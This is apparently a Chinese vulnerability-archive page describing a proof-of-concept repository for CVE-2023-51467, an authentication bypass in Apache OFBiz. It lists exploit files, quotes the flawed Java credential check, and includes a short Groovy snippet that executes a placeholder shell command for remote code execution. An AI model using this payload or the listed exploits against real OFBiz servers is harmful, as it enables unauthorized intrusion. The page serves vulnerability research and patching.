POC详情: 1a2763c15583f3422767b23052550d1a45653745

来源
关联漏洞
标题: Apache OFBiz 代码问题漏洞 (CVE-2023-51467)
描述:Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。 Apache OFBiz 18.12.11之前版本存在代码问题漏洞,该漏洞源于允许攻击者绕过身份验证来实现服务器端请求伪造。
描述
CVE-2023-51467 POC
介绍
# CVE-2023-51467
exp.py 改为命令执行



## Post.txt
序列化漏洞利用
## bypassauth.txt
身份验证绕过测试

## 漏洞原因
由于在身份校验时错误使用空来进行判断,这种方式并未起到效果,导致身份验证被绕过。
```

        if (username == null) username = (String) session.getAttribute("USERNAME");
        if (password == null) password = (String) session.getAttribute("PASSWORD");
        if (token == null) token = (String) session.getAttribute("TOKEN");
        if (UtilValidate.isEmpty(username)) username = (String) session.getAttribute("USERNAME");
        if (UtilValidate.isEmpty(password)) password = (String) session.getAttribute("PASSWORD");
        if (UtilValidate.isEmpty(token)) token = (String) session.getAttribute("TOKEN");


```

## 直接命令执行
有人分析文直接命令执行,但是这种需要绕过groovy过滤。
或者有什么比较好的执行入口。
rce.txt
```def cmd = "your-shell-command"
def process = cmd.execute()
process.waitFor()
println "Exit code: ${process.exitValue()}"
println "Output:\n${process.text}"```

## 参考
https://github.com/apache/ofbiz-framework/commit/47e7959065b82b170da5c330ed5c17af16415ede#diff-68decfd4946b8ef0adcc4c7f18b938aec4a07ff7ce64609a2691ba88a4688607
https://mp.weixin.qq.com/s/vdyqfm0FkbKp5W2LilhbXA
请勿用于非法用途
文件快照

[4.0K] /data/pocs/1a2763c15583f3422767b23052550d1a45653745 ├── [9.7K] apache-ofbiz-xmlrpc-rce.yaml ├── [ 282] bypassauth.txt ├── [1015] CVE-2023-51467.yaml ├── [1.1K] exp.py ├── [1.6K] main.go ├── [4.3K] post.txt ├── [ 557] rce.txt ├── [1.3K] README.md ├── [875K] WechatIMG2748.jpg └── [232K] WechatIMG2749.jpg 0 directories, 10 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。